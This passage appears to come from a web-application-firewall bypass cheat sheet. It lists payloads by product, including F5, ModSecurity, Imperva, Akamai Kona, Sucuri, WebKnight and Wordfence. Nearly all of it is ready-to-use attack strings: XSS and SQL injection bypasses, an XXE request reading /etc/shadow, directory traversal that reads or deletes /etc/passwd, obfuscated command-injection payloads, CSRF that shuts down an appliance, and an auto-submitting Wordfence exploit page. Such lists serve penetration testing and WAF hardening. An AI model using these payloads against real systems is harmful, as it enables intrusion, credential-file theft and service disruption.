  /waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
  /waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0

CSP Bypass by @Binar10
POST Type Query
  POST /<path>/login-app.aspx HTTP/1.1
  Host: <host>
  User-Agent: <any valid user agent string>
  Accept-Encoding: gzip, deflate
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: <the content length must be at least 2399 bytes>

  var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>

GET Type Query
  http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>

F5 ASM
XSS Bypass by @WAFNinja
  <table background="javascript:alert(1)"></table>
  "/><marquee onfinish=confirm(123)>a</marquee>
F5 BIG-IP
XSS Bypass by @WAFNinja
  <body style="height:1000px" onwheel="[DATA]">
  <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
  <body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
  <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">

XSS Bypass by @Aatif Khan
  <body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
  <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">

report_type XSS by @NNPoster
  https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+

POST Based XXE by @Anonymous
  POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
  Host: bigip
  Cookie: BIGIPAuthCookie=*VALID_COOKIE*
  Content-Length: 143

  <?xml version="1.0" encoding='utf-8' ?>
  <!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
  <message><dialogueType>&e;</dialogueType></message>

Directory Traversal by @Anastasios Monachos
Read Arbitrary File
  /tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd

Delete Arbitrary File
  POST /tmui/Control/form HTTP/1.1
  Host: site.com
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
  Content-Type: application/x-www-form-urlencoded

  _form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete


F5 FirePass
SQLi Bypass from @Anonymous
  state=%2527+and+
  (case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
  BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+

ModSecurity
RCE Payloads Detection Bypass for PL3 by @theMiddle (v3.1)
  ;+$u+cat+/etc$u/passwd$u

RCE Payloads Detection Bypass for PL2 by @theMiddle (v3.1)
  ;+$u+cat+/etc$u/passwd+\#

RCE Payloads for PL1 and PL2 by @theMiddle (v3.0)
  /???/??t+/???/??ss??

RCE Payloads for PL3 by @theMiddle (v3.0)
  /?in/cat+/et?/passw?

SQLi Bypass by @Johannes Dahse (v2.2)
  0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user

SQLi Bypass by @Yuri Goltsev (v2.2)
  1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')

SQLi Bypass by @Ahmad Maulana (v2.2)
  1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-

SQLi Bypass by @Travis Lee (v2.2)
  amUserId=1 union select username,password,3,4 from users

SQLi Bypass by @Roberto Salgado (v2.2)
  %0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201

SQLi Bypass by @Georgi Geshev (v2.2)
  1%0bAND(SELECT%0b1%20FROM%20mysql.x)

SQLi Bypass by @SQLMap Devs (v2.2)
  %40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29

SQLi Bypass by @HackPlayers (v2.2)
  %0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201

Imperva
Imperva SecureSphere 13 - Remote Command Execution by @rsp3ar

XSS Bypass by @David Y
  <svg onload\r\n=$.globalEval("al"+"ert()");>

XSS Bypass by @Emad Shanab
  <svg/onload=self[`aler`%2b`t`]`1`>
  anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz

XSS Bypass by @i_bo0om
  <iframe/onload='this["src"]="javas        cript:al"+"ert``"';>
  <img/src=q onerror='new Function`al\ert\`1\``'>

XSS Bypass by @c0d3g33k
  <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>

SQLi Bypass by @DRK1WI
  15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'

SQLi by @Giuseppe D’Amore
  stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
Imperva SecureSphere <= v13 - Privilege Escalation by @0x09AL

Kona SiteDefender
HTML Injection by @sp1d3rs
  %2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E

XSS Bypass by @Jonathan Bouman
  <body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)"

XSS Bypass by @zseano
  ?"></script><base%20c%3D=href%3Dhttps:\mysite>

XSS Bypass by @0xInfection
  <abc/onmouseenter=confirm%60%60>

XSS Bypass by @sp1d3rs
  %2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E

XSS Bypass by @Frans Rosén
  <style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>

XSS Bypass by @Ishaq Mohammed
  <marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

Profense
GET Type CSRF Attack by @Michael Brooks (>= v.2.6.2)
Turn off Profense Machine
  <img src=https://host:2000/ajax.html?action=shutdown>

Add a proxy
  <img src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>

XSS Bypass by @Michael Brooks (>= v.2.6.2)
  https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>

XSS Bypass by @EnableSecurity (>= v2.4)
  %3CEvil%20script%20goes%20here%3E=%0AByPass
  %3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E

QuickDefense
XSS Bypass by @WAFNinja
  ?<input type="search" onsearch="aler\u0074(1)">
  <details ontoggle=alert(1)>

Sucuri
Smuggling RCE Payloads by @theMiddle
  /???/??t+/???/??ss??

Obfuscating RCE Payloads by @theMiddle
  ;+cat+/e'tc/pass'wd
  c\\a\\t+/et\\c/pas\\swd

XSS Bypass by @Luka
  "><input/onauxclick="[1].map(prompt)">

XSS Bypass by @Brute Logic
  data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post>
  <input type=hidden name=a value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>">
  <input type=submit></form>
URLScan
Directory Traversal by @ZeQ3uL (<= v3.1) (Only on ASP.NET)

  http://host.com/test.asp?file=.%./bla.txt

WebARX
Cross Site Scripting by @0xInfection
  <a69/onauxclick=open()>rightclickhere

WebKnight
Cross Site Scripting by @WAFNinja
  <isindex action=j        a        vas        c        r        ipt:alert(1) type=image>
  <marquee/onstart=confirm(2)>
  <details ontoggle=alert(1)>
  <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
  <img src=x onwheel=prompt(1)>

SQLi by @WAFNinja
  0 union(select 1,username,password from(users))
  0 union(select 1,@@hostname,@@datadir)

XSS Bypass by @Aatif Khan (v4.1)
  <details ontoggle=alert(1)>
  <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">

SQLi Bypass by @ZeQ3uL
  10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

Wordfence
XSS Bypass by @Brute Logic
  <a href=javascript:alert(1)>

XSS Bypass by @0xInfection
  <a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:/**/alert()/**/>click

HTML Injection by @Voxel
  http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

XSS Exploit by @MustLive (>= v3.3.5)
  <html>
  <head>
  <title>Wordfence Security XSS exploit (C) 2012 MustLive.
  http://websecurity.com.ua</title>
  </head>
  <body onLoad="document.hack.submit()">
  <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
  <input type="hidden" name="email"
  value="<script>alert(document.cookie)</script>">
  </form>
  </body>
  </html>

Other XSS Bypasses
  <meter onmouseover="alert(1)"
  '">><div><meter onmouseover="alert(1)"</div>"
  >><marquee loop=1 width=0 onfinish=alert(1)>

Apache Generic
Writing method type in lowercase by @i_bo0om
  get /login HTTP/1.1
  Host: favoritewaf.com
  User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

IIS Generic
Tabs before method by @i_bo0om
  GET /login.php HTTP/1.1
  Host: favoritewaf.com
  User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)